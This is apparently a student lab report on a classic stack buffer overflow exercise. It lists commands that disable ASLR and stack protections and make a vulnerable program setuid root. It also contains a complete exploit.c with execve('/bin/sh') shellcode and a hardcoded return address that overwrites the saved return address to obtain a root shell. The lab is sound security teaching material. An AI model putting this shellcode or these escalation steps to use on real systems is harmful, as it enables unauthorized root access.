实验概述

• Buffer overflow 定义  Buffer overflow is defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated fixed length buffers.

• 缓冲区溢出存在的问题 This vulnerability can be utilized by a malicious user to alter the flow control of the program, even execute arbitrary pieces of code. This vulnerability arises due to the mixing of the storage for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can affect the control flow of the program, because an overflow can change the return address.

实验目的

The task is to develop a scheme to exploit the vulnerability and finally gain the root privilege. In addition to the attacks, students will be guided to walk through several protection schemes that have been implemented in the operating system to counter against buffer-overflow attacks. Students need to evaluate whether the schemes work or not and explain why.

实验内容

Task1

sudo sysctl -w kernel.randomize_va_space=0

sudo rm /bin/sh
sudo ln -s /bin/zsh /bin/sh

gcc -z execstack -o call_shellcode call_shellcode.c

Task2

sudo sysctl -w kernel.randomize_va_space=0

sudo rm /bin/sh
sudo ln -s /bin/zsh /bin/sh

gcc -o stack -z execstack -fno-stack-protector stack.c
sudo chown root stack
sudo chmod 4755 stack # chmod 4755 filename可使此程序具有root的权限

gcc -o exploit exploit.c

exploit.c

/* exploit.c  */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"             /* xorl    %eax,%eax              */
    "\x50"                 /* pushl   %eax                   */
    "\x68""//sh"           /* pushl   $0x68732f2f            */
    "\x68""/bin"           /* pushl   $0x6e69622f            */
    "\x89\xe3"             /* movl    %esp,%ebx              */
    "\x50"                 /* pushl   %eax                   */
    "\x53"                 /* pushl   %ebx                   */
    "\x89\xe1"             /* movl    %esp,%ecx              */
    "\x99"                 /* cdq                            */
    "\xb0\x0b"             /* movb    $0x0b,%al              */
    "\xcd\x80"             /* int     $0x80                  */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer + 100, shellcode);                    //将shellcode拷贝至buffer
    strcpy(buffer + 0x24, "\x5c\xeb\xff\xbf");          //在buffer特定偏移处起始的四个字节覆盖sellcode地址
    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}

Task3

sudo rm /bin/sh
sudo ln -s /bin/dash /bin/sh

gcc dash_shell_test.c -o dash_shell_test
sudo chown root dash_shell_test
sudo chmod 4755 dash_shell_test

gcc -o exploit_task3 exploit_task3.c

Task4

sudo /sbin/sysctl -w kernel.randomize_va_space=2

sh task4.sh

Task5

sudo sysctl -w kernel.randomize_va_space=0

gcc -o stack -z execstack stack.c
sudo chown root stack
sudo chmod 4755 stack

Task6

sudo sysctl -w kernel.randomize_va_space=0

gcc -o stack -fno-stack-protector -z noexecstack stack.c
sudo chown root stack
sudo chmod 4755 stack